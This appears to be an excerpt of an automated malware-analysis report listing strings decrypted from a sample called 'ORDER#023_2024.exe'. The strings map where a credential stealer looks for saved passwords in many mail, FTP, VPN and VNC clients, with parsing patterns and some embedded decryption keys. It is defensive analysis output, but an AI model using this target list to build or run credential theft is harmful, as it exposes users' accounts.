                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Default\EncryptedStorage
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Profile
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \EncryptedStorage
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: entries
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: category
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Password
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: str3
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: str2
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: blob0
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: password_value
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: IncrediMail
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: PopPassword
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SmtpPassword
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Software\IncrediMail\Identities\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Accounts_New
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: PopPassword
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SmtpPassword
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SmtpServer
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: EmailAddress
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Eudora
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: current
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Settings
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SavePasswordText
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Settings
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ReturnAddress
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Falkon Browser
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \falkon\profiles\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: profiles.ini
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: profiles.ini
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \browsedata.db
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: autofill
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ClawsMail
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Claws-mail
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \clawsrc
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \clawsrc
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: passkey0
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: master_passphrase_salt=(.+)
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \accountrc
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: smtp_server
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: address
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: account
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \passwordstorerc
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {(.*),(.*)}(.*)
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Flock Browser
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: APPDATA
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \Flock\Browser\
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: signons3.txt
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: DynDns
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: ALLUSERSPROFILE
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Dyn\Updater\config.dyndns
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: username=
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: password=
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: https://account.dyn.com/
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: t6KzXhCh
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: ALLUSERSPROFILE
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Dyn\Updater\daemon.cfg
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: global
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: accounts
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: account.
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: username
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: account.
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: password
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Psi/Psi+
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: name
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: password
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Psi/Psi+
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: APPDATA
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \Psi\profiles
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: APPDATA
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \Psi+\profiles
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \accounts.xml
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \accounts.xml
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: OpenVPN
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Software\OpenVPN-GUI\configs
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Software\OpenVPN-GUI\configs
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Software\OpenVPN-GUI\configs\
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: username
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: auth-data
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: entropy
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: USERPROFILE
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \OpenVPN\config\
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: remote
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: remote
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: NordVPN
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: NordVPN
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: NordVpn.exe*
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: user.config
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: //setting[@name='Username']/value
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: //setting[@name='Password']/value
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: NordVPN
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Private Internet Access
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: %ProgramW6432%
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Private Internet Access\data
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: ProgramFiles(x86)
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \Private Internet Access\data
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \account.json
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: .*"username":"(.*?)"
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: .*"password":"(.*?)"
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Private Internet Access
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: privateinternetaccess.com
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: FileZilla
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: APPDATA
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \FileZilla\recentservers.xml
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: APPDATA
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \FileZilla\recentservers.xml
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: <Server>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: <Host>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: <Host>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: </Host>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: <Port>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: </Port>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: <User>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: <User>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: </User>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: <Pass encoding="base64">
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: <Pass encoding="base64">
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: </Pass>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: <Pass>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: <Pass encoding="base64">
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: </Pass>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: CoreFTP
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: SOFTWARE\FTPWare\COREFTP\Sites
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: User
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Host
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Port
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: hdfzpysvpzimorhk
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: WinSCP
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: HostName
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: UserName
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Password
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: PublicKeyFile
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: PortNumber
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: [PRIVATE KEY LOCATION: "{0}"]
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: WinSCP
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: ABCDEF
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Flash FXP
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: port
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: user
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: pass
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: quick.dat
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Sites.dat
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \FlashFXP\
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \FlashFXP\
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: FTP Navigator
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: SystemDrive
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \FTP Navigator\Ftplist.txt
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Server
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Password
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: No Password
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: User
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: SmartFTP
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: APPDATA
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: WS_FTP
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: appdata
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: HOST
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: PWD=
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: PWD=
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: FtpCommander
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: SystemDrive
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: SystemDrive
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: SystemDrive
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \cftp\Ftplist.txt
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: ;Password=
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: ;User=
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: ;Server=
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: ;Port=
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: ;Port=
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: ;Password=
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: ;User=
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: ;Anonymous=
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: FTPGetter
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \FTPGetter\servers.xml
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: <server>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: <server_ip>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: <server_ip>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: </server_ip>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: <server_port>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: </server_port>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: <server_user_name>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: <server_user_name>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: </server_user_name>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: <server_user_password>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: <server_user_password>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: </server_user_password>
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: FTPGetter
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: The Bat!
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: appdata
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \The Bat!
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \Account.CFN
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \Account.CFN
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Becky!
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: DataDir
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Folder.lst
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \Mailbox.ini
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Account
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: PassWd
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Account
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: SMTPServer
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Account
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: MailAddress
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Becky!
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Outlook
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Email
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: IMAP Password
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: POP3 Password
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: HTTP Password
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: SMTP Password
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Email
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Email
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Email
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: IMAP Password
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: POP3 Password
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: HTTP Password
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: SMTP Password
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Server
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Windows Mail App
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Software\Microsoft\ActiveSync\Partners
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Email
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Server
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: SchemaId
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: pResourceElement
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: pIdentityElement
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: pPackageSid
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: pAuthenticatorElement
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: syncpassword
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: mailoutgoing
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: FoxMail
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Executable
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: FoxmailPath
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \Storage\
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \Storage\
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \mail
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \mail
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \Accounts\Account.rec0
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \Accounts\Account.rec0
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \Account.stg
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \Account.stg
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: POP3Host
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: SMTPHost
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: IncomingServer
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Account
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: MailAddress
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Password
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: POP3Password
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Opera Mail
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: opera:
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: PocoMail
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: appdata
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \Pocomail\accounts.ini
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Email
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: POPPass
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: SMTPPass
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: SMTP
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: eM Client
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: eM Client\accounts.dat
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: eM Client
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Accounts
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: "Username":"
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: "Secret":"
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: "ProviderName":"
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: o6806642kbM7c5
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Mailbird
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: SenderIdentities
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Accounts
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \Mailbird\Store\Store.db
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Server_Host
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Accounts
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Email
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Username
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: EncryptedPassword
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Mailbird
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: RealVNC 4.x
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Password
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: RealVNC 3.x
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: SOFTWARE\RealVNC\vncserver
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Password
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: RealVNC 4.x
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: SOFTWARE\RealVNC\WinVNC4
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Password
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: RealVNC 3.x
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Software\ORL\WinVNC3
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Password
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: TightVNC
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Software\TightVNC\Server
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Password
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: TightVNC
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Software\TightVNC\Server
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: PasswordViewOnly
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: TightVNC ControlPassword
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Software\TightVNC\Server
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: ControlPassword
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: TigerVNC
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Software\TigerVNC\Server
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Password
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: UltraVNC
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: ProgramFiles(x86)
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
